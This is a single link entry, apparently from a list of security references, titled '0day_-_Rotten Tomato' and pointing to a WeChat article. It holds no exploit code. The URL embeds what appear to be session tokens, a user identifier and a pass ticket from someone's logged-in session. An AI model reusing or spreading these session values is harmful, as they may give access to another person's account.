[0day_-_Rotten Tomato]: https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483689&idx=1&sn=1d83538cebbe2197c44b9e5cc9a7997f&chksm=eaa5bb09ddd2321fc6bc838bc5e996add511eb7875faec2a7fde133c13a5f0107e699d47840c&scene=126&sessionid=1584603915&key=cf63f0cc499df801cce7995aeda59fae16a26f18d48f6a138cf60f02d27a89b7cfe0eab764ee36c6208343e0c235450a6bd202bf7520f6368cf361466baf9785a1bcb8f1965ac9359581d1eee9c6c1b6&ascene=1&uin=NTgyNDEzOTc%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=A8KlWjR%2F8GBWKaJZTJ2e5Fg%3D&pass_ticket=B2fG6ICJb5vVp1dbPCh3AOMIfoBgH2TXNSxmnLYPig8%3D